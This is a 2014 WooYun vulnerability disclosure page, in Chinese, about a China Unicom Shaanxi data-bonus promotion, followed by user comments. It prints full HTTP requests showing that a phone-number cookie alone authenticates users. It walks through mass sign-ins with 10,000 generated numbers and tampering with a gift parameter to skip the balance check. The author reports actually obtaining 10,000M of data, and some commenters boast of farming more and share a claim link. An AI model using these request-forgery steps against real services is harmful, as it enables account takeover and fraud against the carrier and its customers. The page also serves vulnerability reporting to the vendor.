当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-077962

漏洞标题:中国联通某漏洞刷流量(已刷10000M)

相关厂商:中国联通

漏洞作者: 鸟云厂商

提交时间:2014-10-06 23:08

修复时间:2014-11-20 23:10

公开时间:2014-11-20 23:10

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-06: 细节已通知厂商并且等待厂商处理中
2014-10-11: 厂商已经确认,细节仅向厂商公开
2014-10-21: 细节向核心白帽子及相关领域专家公开
2014-10-31: 细节向普通白帽子公开
2014-11-10: 细节向实习白帽子公开
2014-11-20: 细节向公众公开

简要描述:

中国联通某漏洞刷流量(已刷10000M)

详细说明:

陕西联通流量红包活动
活动在fql.me上
首先签到的时候抓包

POST /llhb/userSignIn?st=Tue%20Sep%2030%202014%2018:22:29%20GMT+0800%20(CST) HTTP/1.1
Host: fql.me
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A405 MicroMessenger/5.4.2 NetType/WIFI
X-Requested-With: XMLHttpRequest
Accept: */*
Referer: http://fql.me/llhb/index
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: keep-alive
Cookie: JSESSIONID=1AC76AE2A9A0CDC6F05041DB6F7EC716; dengluchenggong=156*******; duanxinxianshi=156*******; gxhllbcxphone=156*******; qxinPhoen="156*******,0559"; xSXLLHBNumberCookie=156*******; xUpCallingLineIdCookie="aMGGZwYfvyv58hY+erfslw=="
Proxy-Connection: keep-alive
Content-Length: 15
Origin: http://fql.me
Accept-Encoding: gzip, deflate
tel=156*******


注意,其中有个参数。
xSXLLHBNumberCookie=156*******;
唯一的身份验证就是这个,直接更改了可以登录任意用户的账号。
#刷流量方法1
------批量刷流量
用工具生成个联通手机号字典,10000个号码
然后签到的时候抓包,批量替换其中的tel参数和cookie中的号码,给这些账户批量签到。

屏幕快照 2014-09-30 下午6.28.37.png


然后使用流量转赠功能,转赠的时候抓包。

POST /llhb/order?st=Tue%20Sep%2030%202014%2018:09:57%20GMT+0800%20(CST) HTTP/1.1
Host: fql.me
Accept: */*
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://fql.me
Content-Length: 105
Connection: keep-alive
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A405 Safari/600.1.4
Referer: http://fql.me/llhb/index/giving
Cookie: JSESSIONID=1E1708BE75523158A681C63BF8210FBE; xSXLLHBNumberCookie=§156*******§
tel=156*******&productCode=%23%2C%23%2C-5&productName=5M&givingTel=156156*******&givingFlag=1&believeFlag=


把tel设置为自己的手机号,givingTel和xSXLLHBNunberCookie设置为变量,然后Start attack
看看我的流量

IMG_0449.PNG


#刷流量方法2
------粗暴刷流量
在赠送流量时,会有两个POST请求,第一个是

POST
tel=156*******&productCode=%23%2C%23%2C-5&flag=givingFlow


这里是校验你是不是有足够的流量用于赠送,别动这个请求,直接PASS。
然后第二个请求

POST
tel=156*******&productCode=%23%2C%23%2C-5&productName=5M&givingTel=156*******&givingFlag=1&believeFlag=


这个请求的productCode可以直接修改为你想要的数字,没有第二次校验了。一次直接简单粗暴地送几千兆。
为了更直观,给大家用另外个账号证明了。

IMG_0450.PNG


漏洞证明:

60CFB1A76F277F79DA2555ECF8611449.png


2B47E8B3ABAB9F2CE56DD16AD7F969FB.png

修复方案:

版权声明:转载请注明来源 鸟云厂商@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2014-10-11 16:41

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2014-09-30 18:51 | ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)

    联通用户飘过

  2. 2014-09-30 18:52 | jeffreys125 ( 实习白帽子 | Rank:63 漏洞数:14 | 懒人。。)

    这个mark下

  3. 2014-09-30 18:53 | 天地不仁 以万物为刍狗 ( 普通白帽子 | Rank:977 漏洞数:264 | 天地本不仁 万物为刍狗)

    虽然不是联通 但是感觉好厉害

  4. 2014-09-30 19:10 | erevus ( 普通白帽子 | Rank:177 漏洞数:31 | Hacked by @ringzero 我錯了)

    求细节

  5. 2014-09-30 19:13 | 咖啡 ( 实习白帽子 | Rank:48 漏洞数:20 )

    好厉害, 能帮我移动2G 80M都用不完

  6. 2014-09-30 19:33 | 0749orz ( 路人 | Rank:3 漏洞数:4 | 厌了,烦了~~~)

    感觉好厉害

  7. 2014-09-30 19:39 | 鸟云厂商 认证白帽子 ( 核心白帽子 | Rank:1313 漏洞数:146 | 中国菜鸟)

    @魇 省级联通,不是全国哒

  8. 2014-09-30 19:40 | 1c3z ( 实习白帽子 | Rank:88 漏洞数:29 | 我读书少,你可别骗我!!!)

    我要刷流量!!!

  9. 2014-09-30 19:56 | 李旭敏 ( 普通白帽子 | Rank:469 漏洞数:71 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)

    好久不见

  10. 2014-09-30 19:58 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 承接:钻井,架工,木工,电工,水暖工,力...)

    求公开

  11. 2014-09-30 20:25 | 紫衣大侠 ( 普通白帽子 | Rank:201 漏洞数:21 | 愿结天下有识之士)

    @鸟云厂商,难道是上海联通的送流量的那个活动?

  12. 2014-09-30 20:26 | 鸟云厂商 认证白帽子 ( 核心白帽子 | Rank:1313 漏洞数:146 | 中国菜鸟)

    @紫衣大侠 不是

  13. 2014-09-30 20:36 | 帅爆的小烬烬 ( 路人 | Rank:30 漏洞数:25 | 路上有个漂亮妹子和我搭讪,知道我赶着去挖...)

    mark

  14. 2014-09-30 20:36 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    庆十一活动么

  15. 2014-09-30 20:54 | CoffeeSafe ( 普通白帽子 | Rank:142 漏洞数:37 )

    你让大家国庆快乐了~

  16. 2014-09-30 21:58 | ki11y0u ( 普通白帽子 | Rank:104 漏洞数:23 | 好好学习,求带飞~~~~~~~~~~~~~~~~~~~~~~...)

    我靠10G,可以在线看电影了。

  17. 2014-09-30 22:05 | Jack.Chalres ( 实习白帽子 | Rank:39 漏洞数:15 | ..............)

    又要逆天了

  18. 2014-09-30 22:07 | scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)

    根本停不下来嘛?

  19. 2014-09-30 23:58 | 鸟云厂商 认证白帽子 ( 核心白帽子 | Rank:1313 漏洞数:146 | 中国菜鸟)

    @李旭敏 约吗

  20. 2014-09-30 23:58 | 鸟云厂商 认证白帽子 ( 核心白帽子 | Rank:1313 漏洞数:146 | 中国菜鸟)

    @李旭敏 约吗

  21. 2014-10-01 08:02 | 0x_Jin ( 普通白帽子 | Rank:319 漏洞数:37 | 微博:http://weibo.com/J1n9999)

    - - 好屌 如果是4G的话 今年网费钱又可以省了

  22. 2014-10-01 08:35 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    马克

  23. 2014-10-02 00:24 | 刘海哥 ( 普通白帽子 | Rank:114 漏洞数:28 | 索要联系方式但不送礼物的厂商定义为无良厂...)

    我的刷漏洞忘记提交自己刷200m就挂了

  24. 2014-10-05 19:31 | 炊烟 ( 普通白帽子 | Rank:238 漏洞数:44 | 每一天都需要努力。)

    竟然忽略了

  25. 2014-10-05 21:18 | 从容 ( 普通白帽子 | Rank:221 漏洞数:75 | Enjoy Hacking Just Because It's Fun :) ...)

    9个多G的流量...够你在线看几十个AV了

  26. 2014-10-05 21:44 | 0749orz ( 路人 | Rank:3 漏洞数:4 | 厌了,烦了~~~)

    还能刷不?

  27. 2014-10-05 22:29 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    今儿好多都忽略了…

  28. 2014-10-05 23:41 | 基佬库克 ( 实习白帽子 | Rank:75 漏洞数:15 | 简介什么的是直接爆菊吧..)

    浙江的100M上限。。刷也没意思

  29. 2014-10-06 00:34 | 小小鸟 ( 路人 | Rank:8 漏洞数:6 | 小白一个)

    求流量啊~

  30. 2014-10-06 23:10 | dsb2468 ( 路人 | Rank:5 漏洞数:1 )

    http://www.hackdig.com/?10/hack-14267.htm

  31. 2014-10-06 23:12 | ki11y0u ( 普通白帽子 | Rank:104 漏洞数:23 | 好好学习,求带飞~~~~~~~~~~~~~~~~~~~~~~...)

    不是公开了么,怎么又变成最新提交了?

  32. 2014-10-06 23:15 | 鸟云厂商 认证白帽子 ( 核心白帽子 | Rank:1313 漏洞数:146 | 中国菜鸟)

    @dsb2468 @ki11y0u 之前乌云的国庆冻结机制有点问题所以被公开了 现在重新回滚的

  33. 2014-10-06 23:49 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    .......

  34. 2014-10-07 00:00 | YY-2012 ( 普通白帽子 | Rank:2763 漏洞数:641 | 意淫,是《红楼梦》原创的词汇,但后来演变...)

    已刷8g流量

  35. 2014-10-07 00:01 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @鸟云厂商 这尼玛,我看到了详情又忘记了!

  36. 2014-10-07 00:23 | ki11y0u ( 普通白帽子 | Rank:104 漏洞数:23 | 好好学习,求带飞~~~~~~~~~~~~~~~~~~~~~~...)

    @U神 http://www.hackdig.com/?10/hack-14267.htm

  37. 2014-10-07 01:05 | huc-ray ( 路人 | Rank:25 漏洞数:7 | 菜鸟一枚)

    @疯狗 求审核

  38. 2014-10-07 08:41 | scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)

    我们这里没有这么屌炸的活动啊

  39. 2014-10-07 10:40 | RainShine ( 路人 | Rank:2 漏洞数:4 )

    Mark

  40. 2014-10-07 11:14 | iwork ( 路人 | Rank:13 漏洞数:2 | 不想死就不会死。)

    http://fql.me/llhb/receivePrize/148e89851bc刷撒哟,大家直接领取就是了,我已经刷好了,见者有份。请叫我雷锋。

  41. 2014-10-10 18:20 | Colors ( 路人 | Rank:6 漏洞数:2 | 小白一枚)

    此联通用户没有赶上

  42. 2014-10-11 16:48 | 暖暖 ( 路人 | Rank:7 漏洞数:2 | 屌丝一个。)

    我是联通2G的,10M都用不完怎么办

  43. 2014-10-11 21:08 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    回头会不会被扣到负数?

  44. 2014-11-03 11:59 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    这个被撤销没?